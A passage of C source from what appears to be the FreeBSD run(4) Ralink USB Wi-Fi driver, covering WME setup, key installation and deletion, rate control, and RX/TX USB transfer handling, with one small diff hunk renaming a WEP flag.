wmesp->wme_params[WME_AC_BE].wmep_aifsn); if (error) goto err; error = run_write(sc, RT2860_WMM_CWMIN_CFG, wmesp->wme_params[WME_AC_VO].wmep_logcwmin << 12 | wmesp->wme_params[WME_AC_VI].wmep_logcwmin << 8 | wmesp->wme_params[WME_AC_BK].wmep_logcwmin << 4 | wmesp->wme_params[WME_AC_BE].wmep_logcwmin); if (error) goto err; error = run_write(sc, RT2860_WMM_CWMAX_CFG, wmesp->wme_params[WME_AC_VO].wmep_logcwmax << 12 | wmesp->wme_params[WME_AC_VI].wmep_logcwmax << 8 | wmesp->wme_params[WME_AC_BK].wmep_logcwmax << 4 | wmesp->wme_params[WME_AC_BE].wmep_logcwmax); if (error) goto err; error = run_write(sc, RT2860_WMM_TXOP0_CFG, wmesp->wme_params[WME_AC_BK].wmep_txopLimit << 16 | wmesp->wme_params[WME_AC_BE].wmep_txopLimit); if (error) goto err; error = run_write(sc, RT2860_WMM_TXOP1_CFG, wmesp->wme_params[WME_AC_VO].wmep_txopLimit << 16 | wmesp->wme_params[WME_AC_VI].wmep_txopLimit); err: if (error) DPRINTF("WME update failed\n"); return; } static int run_wme_update(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; /* sometimes called without the lock held */ if (mtx_owned(&ic->ic_comlock.mtx)) { uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_wme_update_cb; sc->cmdq[i].arg0 = ic; ieee80211_runtask(ic, &sc->cmdq_task); return (0); } RUN_LOCK(sc); run_wme_update_cb(ic); RUN_UNLOCK(sc); /* return whatever, the upper layer doesn't care anyway */ return (0); } static void run_key_update_begin(struct ieee80211vap *vap) { /* * To avoid out-of-order events, both run_key_set() and * _delete() are deferred and handled by run_cmdq_cb(). * So, there is nothing we need to do here. */ } static void run_key_update_end(struct ieee80211vap *vap) { /* null */ } static void run_key_set_cb(void *arg) { struct run_cmdq *cmdq = arg; struct ieee80211vap *vap = cmdq->arg1; struct ieee80211_key *k = cmdq->k; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; uint32_t attr; uint16_t base, associd; uint8_t mode, wcid, iv[8]; RUN_LOCK_ASSERT(sc, MA_OWNED); if (vap->iv_opmode == IEEE80211_M_HOSTAP) ni = ieee80211_find_vap_node(&ic->ic_sta, vap, cmdq->mac); else ni = vap->iv_bss; associd = (ni != NULL) ?
ni->ni_associd : 0; /* map net80211 cipher to RT2860 security mode */ switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: if(k->wk_keylen < 8) mode = RT2860_MODE_WEP40; else mode = RT2860_MODE_WEP104; break; case IEEE80211_CIPHER_TKIP: mode = RT2860_MODE_TKIP; break; case IEEE80211_CIPHER_AES_CCM: mode = RT2860_MODE_AES_CCMP; break; default: DPRINTF("undefined case\n"); return; } DPRINTFN(1, "associd=%x, keyix=%d, mode=%x, type=%s, tx=%s, rx=%s\n", associd, k->wk_keyix, mode, (k->wk_flags & IEEE80211_KEY_GROUP) ? "group" : "pairwise", (k->wk_flags & IEEE80211_KEY_XMIT) ? "on" : "off", (k->wk_flags & IEEE80211_KEY_RECV) ? "on" : "off"); if (k->wk_flags & IEEE80211_KEY_GROUP) { wcid = 0; /* NB: update WCID0 for group keys */ base = RT2860_SKEY(RUN_VAP(vap)->rvp_id, k->wk_keyix); } else { wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(associd); base = RT2860_PKEY(wcid); } if (k->wk_cipher->ic_cipher == IEEE80211_CIPHER_TKIP) { if(run_write_region_1(sc, base, k->wk_key, 16)) return; if(run_write_region_1(sc, base + 16, &k->wk_key[16], 8)) /* wk_txmic */ return; if(run_write_region_1(sc, base + 24, &k->wk_key[24], 8)) /* wk_rxmic */ return; } else { /* roundup len to 16-bit: XXX fix write_region_1() instead */ if(run_write_region_1(sc, base, k->wk_key, (k->wk_keylen + 1) & ~1)) return; } if (!(k->wk_flags & IEEE80211_KEY_GROUP) || (k->wk_flags & (IEEE80211_KEY_XMIT | IEEE80211_KEY_RECV))) { /* set initial packet number in IV+EIV */ if (k->wk_cipher == IEEE80211_CIPHER_WEP) { memset(iv, 0, sizeof iv); iv[3] = vap->iv_def_txkey << 6; } else { if (k->wk_cipher->ic_cipher == IEEE80211_CIPHER_TKIP) { iv[0] = k->wk_keytsc >> 8; iv[1] = (iv[0] | 0x20) & 0x7f; iv[2] = k->wk_keytsc; } else /* CCMP */ { iv[0] = k->wk_keytsc; iv[1] = k->wk_keytsc >> 8; iv[2] = 0; } iv[3] = k->wk_keyix << 6 | IEEE80211_WEP_EXTIV; iv[4] = k->wk_keytsc >> 16; iv[5] = k->wk_keytsc >> 24; iv[6] = k->wk_keytsc >> 32; iv[7] = k->wk_keytsc >> 40; } if (run_write_region_1(sc, RT2860_IVEIV(wcid), iv, 8)) return; } if (k->wk_flags & IEEE80211_KEY_GROUP) { /* install group key */ if (run_read(sc, RT2860_SKEY_MODE_0_7, &attr)) return; attr &= ~(0xf << (k->wk_keyix * 4)); attr |= mode << (k->wk_keyix * 4); if (run_write(sc, RT2860_SKEY_MODE_0_7, attr)) return; } else { /* install pairwise key */ if (run_read(sc, RT2860_WCID_ATTR(wcid), &attr)) return; attr = (attr & ~0xf) | (mode << 1) | RT2860_RX_PKEY_EN; if (run_write(sc, RT2860_WCID_ATTR(wcid), attr)) return; } /* TODO create a pass-thru key entry? */ /* need wcid to delete the right key later */ k->wk_pad = wcid; } /* * Don't have to be deferred, but in order to keep order of * execution, i.e. with run_key_delete(), defer this and let * run_cmdq_cb() maintain the order. * * return 0 on error */ static int run_key_set(struct ieee80211vap *vap, struct ieee80211_key *k, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_key_set_cb; sc->cmdq[i].arg0 = NULL; sc->cmdq[i].arg1 = vap; sc->cmdq[i].k = k; IEEE80211_ADDR_COPY(sc->cmdq[i].mac, mac); ieee80211_runtask(ic, &sc->cmdq_task); /* * To make sure key will be set when hostapd * calls iv_key_set() before if_init(). */ if (vap->iv_opmode == IEEE80211_M_HOSTAP) { RUN_LOCK(sc); sc->cmdq_key_set = RUN_CMDQ_GO; RUN_UNLOCK(sc); } return (1); } /* * If wlan is destroyed without being brought down i.e. 
without * wlan down or wpa_cli terminate, this function is called after * vap is gone. Don't refer it. */ static void run_key_delete_cb(void *arg) { struct run_cmdq *cmdq = arg; struct run_softc *sc = cmdq->arg1; struct ieee80211_key *k = &cmdq->key; uint32_t attr; uint8_t wcid; RUN_LOCK_ASSERT(sc, MA_OWNED); if (k->wk_flags & IEEE80211_KEY_GROUP) { /* remove group key */ DPRINTF("removing group key\n"); run_read(sc, RT2860_SKEY_MODE_0_7, &attr); attr &= ~(0xf << (k->wk_keyix * 4)); run_write(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* remove pairwise key */ DPRINTF("removing key for wcid %x\n", k->wk_pad); /* matching wcid was written to wk_pad in run_key_set() */ wcid = k->wk_pad; run_read(sc, RT2860_WCID_ATTR(wcid), &attr); attr &= ~0xf; run_write(sc, RT2860_WCID_ATTR(wcid), attr); run_set_region_4(sc, RT2860_WCID_ENTRY(wcid), 0, 8); } k->wk_pad = 0; } /* * return 0 on error */ static int run_key_delete(struct ieee80211vap *vap, struct ieee80211_key *k) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_key *k0; uint32_t i; /* * When called back, key might be gone. So, make a copy * of some values need to delete keys before deferring. * But, because of LOR with node lock, cannot use lock here. * So, use atomic instead. */ i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_key_delete_cb; sc->cmdq[i].arg0 = NULL; sc->cmdq[i].arg1 = sc; k0 = &sc->cmdq[i].key; k0->wk_flags = k->wk_flags; k0->wk_keyix = k->wk_keyix; /* matching wcid was written to wk_pad in run_key_set() */ k0->wk_pad = k->wk_pad; ieee80211_runtask(ic, &sc->cmdq_task); return (1); /* return fake success */ } static void run_ratectl_to(void *arg) { struct run_softc *sc = arg; /* do it in a process context, so it can go sleep */ ieee80211_runtask(sc->sc_ifp->if_l2com, &sc->ratectl_task); /* next timeout will be rescheduled in the callback task */ } /* ARGSUSED */ static void run_ratectl_cb(void *arg, int pending) { struct run_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (vap == NULL) return; if (sc->rvp_cnt <= 1 && vap->iv_opmode == IEEE80211_M_STA) run_iter_func(sc, vap->iv_bss); else { /* * run_reset_livelock() doesn't do anything with AMRR, * but Ralink wants us to call it every 1 sec. So, we * piggyback here rather than creating another callout. * Livelock may occur only in HOSTAP or IBSS mode * (when h/w is sending beacons). */ RUN_LOCK(sc); run_reset_livelock(sc); /* just in case, there are some stats to drain */ run_drain_fifo(sc); RUN_UNLOCK(sc); ieee80211_iterate_nodes(&ic->ic_sta, run_iter_func, sc); } RUN_LOCK(sc); if(sc->ratectl_run != RUN_RATECTL_OFF) usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); RUN_UNLOCK(sc); } static void run_drain_fifo(void *arg) { struct run_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t stat; uint16_t (*wstat)[3]; uint8_t wcid, mcs, pid; int8_t retry; RUN_LOCK_ASSERT(sc, MA_OWNED); for (;;) { /* drain Tx status FIFO (maxsize = 16) */ run_read(sc, RT2860_TX_STAT_FIFO, &stat); DPRINTFN(4, "tx stat 0x%08x\n", stat); if (!(stat & RT2860_TXQ_VLD)) break; wcid = (stat >> RT2860_TXQ_WCID_SHIFT) & 0xff; /* if no ACK was requested, no feedback is available */ if (!(stat & RT2860_TXQ_ACKREQ) || wcid > RT2870_WCID_MAX || wcid == 0) continue; /* * Even though each stat is Tx-complete-status like format, * the device can poll stats. 
Because there is no guarantee * that the referring node is still around when we read the stats, * if we used ieee80211_ratectl_tx_update() here we would * have a hard time not referring to an already freed node. * * To avoid such accesses to freed nodes, we poll the stats into the softc. * Then, update the rates later with ieee80211_ratectl_tx_update(). */ wstat = &(sc->wcid_stats[wcid]); (*wstat)[RUN_TXCNT]++; if (stat & RT2860_TXQ_OK) (*wstat)[RUN_SUCCESS]++; else ifp->if_oerrors++; /* * Check if there were retries, i.e. if the Tx success rate is * different from the requested rate. Note that it works only * because we do not allow rate fallback from OFDM to CCK. */ mcs = (stat >> RT2860_TXQ_MCS_SHIFT) & 0x7f; pid = (stat >> RT2860_TXQ_PID_SHIFT) & 0xf; if ((retry = pid - 1 - mcs) > 0) { (*wstat)[RUN_TXCNT] += retry; (*wstat)[RUN_RETRY] += retry; } } DPRINTFN(3, "count=%d\n", sc->fifo_cnt); sc->fifo_cnt = 0; } static void run_iter_func(void *arg, struct ieee80211_node *ni) { struct run_softc *sc = arg; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct run_node *rn = (void *)ni; union run_stats sta[2]; uint16_t (*wstat)[3]; int txcnt, success, retrycnt, error; RUN_LOCK(sc); if (sc->rvp_cnt <= 1 && (vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_STA)) { /* read statistic counters (clear on read) and update AMRR state */ error = run_read_region_1(sc, RT2860_TX_STA_CNT0, (uint8_t *)sta, sizeof sta); if (error != 0) goto fail; /* count failed TX as errors */ ifp->if_oerrors += le16toh(sta[0].error.fail); retrycnt = le16toh(sta[1].tx.retry); success = le16toh(sta[1].tx.success); txcnt = retrycnt + success + le16toh(sta[0].error.fail); DPRINTFN(3, "retrycnt=%d success=%d failcnt=%d\n", retrycnt, success, le16toh(sta[0].error.fail)); } else { wstat = &(sc->wcid_stats[RUN_AID2WCID(ni->ni_associd)]); if (wstat == &(sc->wcid_stats[0]) || wstat > &(sc->wcid_stats[RT2870_WCID_MAX])) goto fail; txcnt = (*wstat)[RUN_TXCNT]; success = (*wstat)[RUN_SUCCESS]; retrycnt = (*wstat)[RUN_RETRY]; DPRINTFN(3, "retrycnt=%d txcnt=%d success=%d\n", retrycnt, txcnt, success); memset(wstat, 0, sizeof(*wstat)); } ieee80211_ratectl_tx_update(vap, ni, &txcnt, &success, &retrycnt); rn->amrr_ridx = ieee80211_ratectl_rate(ni, NULL, 0); fail: RUN_UNLOCK(sc); DPRINTFN(3, "ridx=%d\n", rn->amrr_ridx); } static void run_newassoc_cb(void *arg) { struct run_cmdq *cmdq = arg; struct ieee80211_node *ni = cmdq->arg1; struct run_softc *sc = ni->ni_vap->iv_ic->ic_ifp->if_softc; uint8_t wcid = cmdq->wcid; RUN_LOCK_ASSERT(sc, MA_OWNED); run_write_region_1(sc, RT2860_WCID_ENTRY(wcid), ni->ni_macaddr, IEEE80211_ADDR_LEN); memset(&(sc->wcid_stats[wcid]), 0, sizeof(sc->wcid_stats[wcid])); } static void run_newassoc(struct ieee80211_node *ni, int isnew) { struct run_node *rn = (void *)ni; struct ieee80211_rateset *rs = &ni->ni_rates; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; uint8_t rate; uint8_t ridx; uint8_t wcid; int i, j; wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(ni->ni_associd); if (wcid > RT2870_WCID_MAX) { device_printf(sc->sc_dev, "wcid=%d out of range\n", wcid); return; } /* only interested in true associations */ if (isnew && ni->ni_associd != 0) { /* * This function can be called from a timeout (callout) context. * Need to defer.
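* (The deferral goes through the per-softc command queue: run_newassoc_cb() and its arguments are stored in sc->cmdq[] and sc->cmdq_task is scheduled, so the WCID table entry is written later from task context under RUN_LOCK.)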
*/ uint32_t cnt = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", cnt); sc->cmdq[cnt].func = run_newassoc_cb; sc->cmdq[cnt].arg0 = NULL; sc->cmdq[cnt].arg1 = ni; sc->cmdq[cnt].wcid = wcid; ieee80211_runtask(ic, &sc->cmdq_task); } DPRINTF("new assoc isnew=%d associd=%x addr=%s\n", isnew, ni->ni_associd, ether_sprintf(ni->ni_macaddr)); for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i] & IEEE80211_RATE_VAL; /* convert 802.11 rate to hardware rate index */ for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; rn->ridx[i] = ridx; /* determine rate of control response frames */ for (j = i; j >= 0; j--) { if ((rs->rs_rates[j] & IEEE80211_RATE_BASIC) && rt2860_rates[rn->ridx[i]].phy == rt2860_rates[rn->ridx[j]].phy) break; } if (j >= 0) { rn->ctl_ridx[i] = rn->ridx[j]; } else { /* no basic rate found, use mandatory one */ rn->ctl_ridx[i] = rt2860_rates[ridx].ctl_ridx; } DPRINTF("rate=0x%02x ridx=%d ctl_ridx=%d\n", rs->rs_rates[i], rn->ridx[i], rn->ctl_ridx[i]); } rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; rn->mgt_ridx = ridx; DPRINTF("rate=%d, mgmt_ridx=%d\n", rate, rn->mgt_ridx); usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); } /* * Return the Rx chain with the highest RSSI for a given frame. */ static __inline uint8_t run_maxrssi_chain(struct run_softc *sc, const struct rt2860_rxwi *rxwi) { uint8_t rxchain = 0; if (sc->nrxchains > 1) { if (rxwi->rssi[1] > rxwi->rssi[rxchain]) rxchain = 1; if (sc->nrxchains > 2) if (rxwi->rssi[2] > rxwi->rssi[rxchain]) rxchain = 2; } return (rxchain); } static void run_rx_frame(struct run_softc *sc, struct mbuf *m, uint32_t dmalen) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct rt2870_rxd *rxd; struct rt2860_rxwi *rxwi; uint32_t flags; uint16_t len, rxwisize; uint8_t ant, rssi; int8_t nf; rxwi = mtod(m, struct rt2860_rxwi *); len = le16toh(rxwi->len) & 0xfff; rxwisize = sizeof(struct rt2860_rxwi); if (sc->mac_ver == 0x5592) rxwisize += sizeof(uint64_t); else if (sc->mac_ver == 0x3593) rxwisize += sizeof(uint32_t); if (__predict_false(len > dmalen)) { m_freem(m); ifp->if_ierrors++; DPRINTF("bad RXWI length %u > %u\n", len, dmalen); return; } /* Rx descriptor is located at the end */ rxd = (struct rt2870_rxd *)(mtod(m, caddr_t) + dmalen); flags = le32toh(rxd->flags); if (__predict_false(flags & (RT2860_RX_CRCERR | RT2860_RX_ICVERR))) { m_freem(m); ifp->if_ierrors++; DPRINTF("%s error.\n", (flags & RT2860_RX_CRCERR)?"CRC":"ICV"); return; } m->m_data += rxwisize; m->m_pkthdr.len = m->m_len -= rxwisize; wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; m->m_flags |= M_WEP; } if (flags & RT2860_RX_L2PAD) { DPRINTFN(8, "received RT2860_RX_L2PAD frame\n"); len += 2; } ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (__predict_false(flags & RT2860_RX_MICERR)) { /* report MIC failures to net80211 for TKIP */ if (ni != NULL) ieee80211_notify_michael_failure(ni->ni_vap, wh, rxwi->keyidx); m_freem(m); ifp->if_ierrors++; DPRINTF("MIC error. 
Someone is lying.\n"); return; } ant = run_maxrssi_chain(sc, rxwi); rssi = rxwi->rssi[ant]; nf = run_rssi2dbm(sc, rssi, ant); m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = len; if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else { (void)ieee80211_input_all(ic, m, rssi, nf); } if (__predict_false(ieee80211_radiotap_active(ic))) { struct run_rx_radiotap_header *tap = &sc->sc_rxtap; uint16_t phy; tap->wr_flags = 0; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wr_antsignal = rssi; tap->wr_antenna = ant; tap->wr_dbm_antsignal = run_rssi2dbm(sc, rssi, ant); tap->wr_rate = 2; /* in case it can't be found below */ phy = le16toh(rxwi->phy); switch (phy & RT2860_PHY_MODE) { case RT2860_PHY_CCK: switch ((phy & RT2860_PHY_MCS) & ~RT2860_PHY_SHPRE) { case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; } if (phy & RT2860_PHY_SHPRE) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; break; case RT2860_PHY_OFDM: switch (phy & RT2860_PHY_MCS) { case 0: tap->wr_rate = 12; break; case 1: tap->wr_rate = 18; break; case 2: tap->wr_rate = 24; break; case 3: tap->wr_rate = 36; break; case 4: tap->wr_rate = 48; break; case 5: tap->wr_rate = 72; break; case 6: tap->wr_rate = 96; break; case 7: tap->wr_rate = 108; break; } break; } } } static void run_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct run_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m = NULL; struct mbuf *m0; uint32_t dmalen; uint16_t rxwisize; int xferlen; rxwisize = sizeof(struct rt2860_rxwi); if (sc->mac_ver == 0x5592) rxwisize += sizeof(uint64_t); else if (sc->mac_ver == 0x3593) rxwisize += sizeof(uint32_t); usbd_xfer_status(xfer, &xferlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", xferlen); if (xferlen < (int)(sizeof(uint32_t) + rxwisize + sizeof(struct rt2870_rxd))) { DPRINTF("xfer too short %d\n", xferlen); goto tr_setup; } m = sc->rx_m; sc->rx_m = NULL; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: if (sc->rx_m == NULL) { sc->rx_m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE /* xfer can be bigger than MCLBYTES */); } if (sc->rx_m == NULL) { DPRINTF("could not allocate mbuf - idle with stall\n"); ifp->if_ierrors++; usbd_xfer_set_stall(xfer); usbd_xfer_set_frames(xfer, 0); } else { /* * Directly loading a mbuf cluster into DMA to * save some data copying. This works because * there is only one cluster. 
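* (sc->rx_m is a single MJUMPAGESIZE cluster, so its data pointer can be handed straight to usbd_xfer_set_frame_data() as one contiguous RUN_MAX_RXSZ-byte frame buffer.)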
*/ usbd_xfer_set_frame_data(xfer, 0, mtod(sc->rx_m, caddr_t), RUN_MAX_RXSZ); usbd_xfer_set_frames(xfer, 1); } usbd_transfer_submit(xfer); break; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); ifp->if_ierrors++; goto tr_setup; } if (sc->rx_m != NULL) { m_freem(sc->rx_m); sc->rx_m = NULL; } break; } if (m == NULL) return; /* inputting all the frames must be last */ RUN_UNLOCK(sc); m->m_pkthdr.len = m->m_len = xferlen; /* HW can aggregate multiple 802.11 frames in a single USB xfer */ for(;;) { dmalen = le32toh(*mtod(m, uint32_t *)) & 0xffff; if ((dmalen >= (uint32_t)-8) || (dmalen == 0) || ((dmalen & 3) != 0)) { DPRINTF("bad DMA length %u\n", dmalen); break; } if ((dmalen + 8) > (uint32_t)xferlen) { DPRINTF("bad DMA length %u > %d\n", dmalen + 8, xferlen); break; } /* If it is the last one or a single frame, we won't copy. */ if ((xferlen -= dmalen + 8) <= 8) { /* trim 32-bit DMA-len header */ m->m_data += 4; m->m_pkthdr.len = m->m_len -= 4; run_rx_frame(sc, m, dmalen); m = NULL; /* don't free source buffer */ break; } /* copy aggregated frames to another mbuf */ m0 = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (__predict_false(m0 == NULL)) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; break; } m_copydata(m, 4 /* skip 32-bit DMA-len header */, dmalen + sizeof(struct rt2870_rxd), mtod(m0, caddr_t)); m0->m_pkthdr.len = m0->m_len = dmalen + sizeof(struct rt2870_rxd); run_rx_frame(sc, m0, dmalen); /* update data ptr */ m->m_data += dmalen + 8; m->m_pkthdr.len = m->m_len -= dmalen + 8; } /* make sure we free the source buffer, if any */ m_freem(m); RUN_LOCK(sc); } static void run_tx_free(struct run_endpoint_queue *pq, struct run_tx_data *data, int txerr) { if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; if (data->ni == NULL) { DPRINTF("no node\n"); } else { ieee80211_free_node(data->ni); data->ni = NULL; } } STAILQ_INSERT_TAIL(&pq->tx_fh, data, next); pq->tx_nfree++; } static void run_bulk_tx_callbackN(struct usb_xfer *xfer, usb_error_t error, u_int index) { struct run_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct run_tx_data *data; struct ieee80211vap *vap = NULL; struct usb_page_cache *pc; struct run_endpoint_queue *pq = &sc->sc_epq[index]; struct mbuf *m; usb_frlength_t size; int actlen; int sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete: %d " "bytes @ index %d\n", actlen, index); data = usbd_xfer_get_priv(xfer); run_tx_free(pq, data, 0); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&pq->tx_qh); if (data == NULL) break; STAILQ_REMOVE_HEAD(&pq->tx_qh, next); m = data->m; size = (sc->mac_ver == 0x5592) ? RUN_MAX_TXSZ + sizeof(uint32_t) : RUN_MAX_TXSZ; if ((m->m_pkthdr.len + sizeof(data->desc) + 3 + 8) > size) { DPRINTF("data overflow, %u bytes\n", m->m_pkthdr.len); ifp->if_oerrors++; run_tx_free(pq, data, 1); goto tr_setup; } pc = usbd_xfer_get_frame(xfer, 0); size = (sc->mac_ver == 0x5592) ? 
sizeof(data->desc) + sizeof(uint32_t) : sizeof(data->desc); usbd_copy_in(pc, 0, &data->desc, size); usbd_m_copy_in(pc, size, m, 0, m->m_pkthdr.len); size += m->m_pkthdr.len; /* * Align end on a 4-byte boundary, pad 8 bytes (CRC + * 4-byte padding), and be sure to zero those trailing * bytes: */ usbd_frame_zero(pc, size, ((-size) & 3) + 8); size += ((-size) & 3) + 8; vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct run_tx_radiotap_header *tap = &sc->sc_txtap; struct rt2860_txwi *txwi = (struct rt2860_txwi *)(&data->desc + sizeof(struct rt2870_txd)); tap->wt_flags = 0; tap->wt_rate = rt2860_rates[data->ridx].rate; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wt_hwqueue = index; if (le16toh(txwi->phy) & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } DPRINTFN(11, "sending frame len=%u/%u @ index %d\n", m->m_pkthdr.len, size, index); usbd_xfer_set_frame_len(xfer, 0, size); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); RUN_UNLOCK(sc); run_start(ifp); RUN_LOCK(sc); break; default: DPRINTF("USB transfer error, %s\n", usbd_errstr(error)); data = usbd_xfer_get_priv(xfer); ifp->if_oerrors++; if (data != NULL) { if(data->ni != NULL) vap = data->ni->ni_vap; run_tx_free(pq, data, error); usbd_xfer_set_priv(xfer, NULL); } if (vap == NULL) vap = TAILQ_FIRST(&ic->ic_vaps); if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) { device_printf(sc->sc_dev, "device timeout\n"); uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_usb_timeout_cb; sc->cmdq[i].arg0 = vap; ieee80211_runtask(ic, &sc->cmdq_task); } /* * Try to clear the stall first, also when other * errors occur; note that clearing the stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void run_bulk_tx_callback0(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 0); } static void run_bulk_tx_callback1(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 1); } static void run_bulk_tx_callback2(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 2); } static void run_bulk_tx_callback3(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 3); } static void run_bulk_tx_callback4(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 4); } static void run_bulk_tx_callback5(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 5); } static void run_set_tx_desc(struct run_softc *sc, struct run_tx_data *data) { struct mbuf *m = data->m; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = data->ni->ni_vap; struct ieee80211_frame *wh; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t xferlen, txwisize; uint16_t mcs; uint8_t ridx = data->ridx; uint8_t pad; /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; txwisize = (sc->mac_ver == 0x5592) ? sizeof(*txwi) + sizeof(uint32_t) : sizeof(*txwi); xferlen = txwisize + m->m_pkthdr.len; /* roundup to 32-bit alignment */ xferlen = (xferlen + 3) & ~3; txd = (struct rt2870_txd *)&data->desc; txd->len = htole16(xferlen); wh = mtod(m, struct ieee80211_frame *); /* * Either both are true or both are false; either way the header * is nicely aligned to 32 bits, so no L2 padding is needed.
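* (The base 802.11 header is 24 bytes; a 4th address adds 6 bytes and the QoS control field adds 2. Both 24 and 24+6+2=32 are 32-bit aligned, while exactly one of the two extensions yields a 26- or 30-byte header that needs 2 bytes of padding.)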
